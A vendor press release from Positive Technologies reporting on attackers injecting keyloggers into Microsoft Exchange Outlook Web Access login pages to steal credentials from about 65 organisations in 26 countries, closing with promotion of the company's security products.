A total of 65 victim organizations have been identified in 26 countries, and the (Ex)Cobalt group has been observed using a similar attack technique.

A new study by Positive Technologies shows that since the beginning of 2025, nine Russian companies, four of which are software developers, have suffered cyberattacks due to the compromise of the Outlook email client. The attackers embedded malicious code into legitimate authentication pages, which allowed them to remain undetected for extended periods and harvest user credentials.

In May 2024, the Incident Response team at the Positive Technologies Expert Security Center (PT ESC) discovered an attack that used an unknown keylogger¹ injected into the login page of Microsoft Exchange Server. The hackers typically injected malicious code into the clkLgn function (the login button handler) and intercepted plaintext usernames and passwords entered by users during authentication in Outlook Web Access.

Similar incidents were registered in 2025 as well. Positive Technologies discovered nine compromised Russian companies, including software developers and organizations in the fields of education, construction, aerospace industry, public sector, and the military-industrial complex.

In total, the PT ESC Incident Response team identified around 65 victims across 26 countries. Most of the infected servers are in Russia, Vietnam, and Taiwan. The attacks most frequently targeted government institutions, IT firms, industrial enterprises, and logistics companies.

"Having compromised corporate servers, the attackers inject malicious code into Microsoft Exchange authentication pages. This technique enables them to gain persistence in the system and stay undetected for several months. The operating principle of keyloggers used in such attacks is similar across most affected companies, but the methods of data transmission vary: from writing to a file on a server accessible from the internet to sending data through DNS tunnels or Telegram bots. As a result, hackers gain access to corporate user accounts by bypassing insufficiently effective security controls," says Klimentiy Galkin, Threat Intelligence Specialist at the Positive Technologies Expert Security Center.

According to the experts, the attackers exploited well-known vulnerabilities in public-facing Microsoft Exchange servers to inject malware. However, not all of the compromised servers had publicly known vulnerabilities. This suggests that other attack vectors may have been used to breach them.

To counter these threats, companies are advised to implement vulnerability management systems, such as MaxPatrol VM, along with vulnerability scanners, such as XSpider. PT Network Attack Discovery, a behavioral analysis system for network traffic, and PT Application Firewall, a web application firewall, help protect web applications and detect malicious network activity. In addition, SIEM and EDR solutions enable cybersecurity teams to monitor activity on critical servers. Get your cybersecurity team ready for real-world challenges on the Standoff Defend, an online cyberrange. Train on virtual IT infrastructures modeled after typical corporate environments, hone your defense skills under the guidance of experienced mentors, and elevate your professional competencies to a new level.